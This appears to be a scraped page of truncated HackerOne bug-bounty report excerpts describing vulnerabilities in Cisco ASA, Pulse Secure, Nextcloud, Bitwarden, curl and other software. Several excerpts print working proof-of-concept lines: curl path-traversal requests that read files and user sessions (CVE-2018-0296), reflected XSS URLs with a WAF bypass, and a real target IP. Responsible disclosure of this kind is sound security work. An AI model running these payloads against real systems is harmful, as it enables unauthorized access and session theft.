HackerOne Reports
## Description I discovered a previously unidentified instance https://█████ (█████████████) in the ██████ network, vulnerable to CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296) ## POC ``` curl -i -k "https://███/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is ``` █████ We can disclose user sessions by querying /sessions: ``` curl -i -k "https://███████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ## Suggested fix Updating to the latest version should fix the …
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
Critical
$5,000
Closed
## Description Hello. Some time ago, researcher Orange Tsai from the DEVCORE team gave a talk at Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25: **CVE-2019-11510 - Pre-auth Arbitrary File Reading** CVE-2019-11542 - Post-auth Stack Buffer Overflow **CVE-2019-11539 - Post-auth Command Injection** CVE-2019-11538 - Post-auth Arbitrary File Reading **CVE-2019-11508 - …
## Description I discovered a previously unidentified instance https://█████████ (████.██████.mil) in the █████████ network, vulnerable to CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296) ## POC ``` curl -i -k "https://████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is ``` █████████ We can disclose user sessions by querying /sessions: ``` curl -i -k "https://█████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ## Suggested fix Updating to the latest version should fix the …
I would like to report Path Traversal in statics-server # Module **module name:** statics-server **version:** 0.0.9 **npm page:** `https://www.npmjs.com/package/statics-server` ## Module Description > npm install statics-server -g Go to the folder you want to statics-server Run the server statics-server ## Module Stats > 80-100 downloads/month # Vulnerability ## Vulnerability Description …
Hi everyone, I would like to report here a Blind SSRF vulnerability through the Nextcloud `Mail` application. Tested on the latest Mail release: `2.0.1` ## Steps To Reproduce: During the connection process of a mail account on the integrated Mail application of Nextcloud, once all the fields are validated (IMAP, SMTP …
## Summary: A team member with role USER can change the notes of any user, and we are also able to inject some HTML tags ## Steps To Reproduce: 1. Log in with role `owner` and create a `note` 1. Log in as a team member with role `users` 1. Add a `note` and capture it with `burp suite` and …
Summary Hi team, there's a reflected XSS on https://████ using the `plot` param. There's a WAF in place but it's possible to bypass it. Steps to reproduce 1. Click https://██████████/fcgi-bin/getplot.py?plot=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE 2. Observe the popup showing document.domain when right clicking "RIGHT CLICK HERE" ███ ## Impact The attacker can trigger remote …
Summary Hi team, there's a reflected XSS on https://█████████ using the `project` param. There's a WAF in place but it's possible to bypass it. Steps to reproduce 1. Click https://████████/fcgi-bin/release.py?project=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE 2. Observe the popup showing document.domain when right clicking "RIGHT CLICK HERE" ███ ## Impact The attacker can trigger remote …
Dear DoD Team, I am able to execute JavaScript code on www.███████/News/Speeches. This endpoint has a search functionality with the parameter `Search`. The value supplied to this parameter gets embedded into the website. Furthermore, the frontend of the website is presumably created with a template engine. These engines handle …
**Summary:** Recently you allowed us to give testimonials for the sandbox reports, which is vulnerable and allows all researchers to control their **Testimonials** for their own benefit. **Description:** When a report is closed as resolved we are given the option of "This hacker is eligible for a testimonial" in …
This bug was reported directly to GitHub Security Lab.
## Summary: If an attacker can set environmental variables, curl will always crash with a buffer overflow when downloading a file – if the `--progress-bar` argument is set. ## Steps To Reproduce: Just run the following command on a **64-bit Linux** system (verified on Ubuntu 19.04). ```bash # Of course …
Hi H1, mattermost.cloud has a feature for making a channel, and once it's set to public any other user can join the channel and post comments on that channel. In System Console --> Channel --> Permission, the channel owner can assign whether a member can post comments or not. Once the channel owner …
An attacker can upload malicious graphies via (http://graphie-to-png.kasandbox.org/) and (http://graphie-to-png.khanacademy.systems/) that exploit the graphie renderer. The attack targets any page that has a graphie (`khanacademy.org`!!), as well as `cdn.kastatic.org` and `ka-perseus-graphie.s3.amazonaws.com` # Proof of concept ## Step 1: Uploading a malicious graphie Consider the following example where https://ka-perseus-graphie.s3.amazonaws.com/2122427aa8dc4ef2a59058bc1a7a934ba6ca6747.svg is …
After a credential has been added to vault.bitwarden.com (or any self-hosted installation), if the settings allow website icons to be fetched (https://bitwarden.com/help/article/website-icons/), the Bitwarden server will try to fetch the icon image. The relevant source code is https://github.com/bitwarden/server/blob/master/src/Icons/Controllers/IconsController.cs#L42-L65 and https://github.com/bitwarden/server/blob/master/src/Icons/Services/IconFetchingService.cs#L59 As we can see in the second link, just the …
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal. The IP has an SSL certificate pointing to ElasticSearch. `curl -kv https://52.204.160.31` Output ``` Server certificate: * …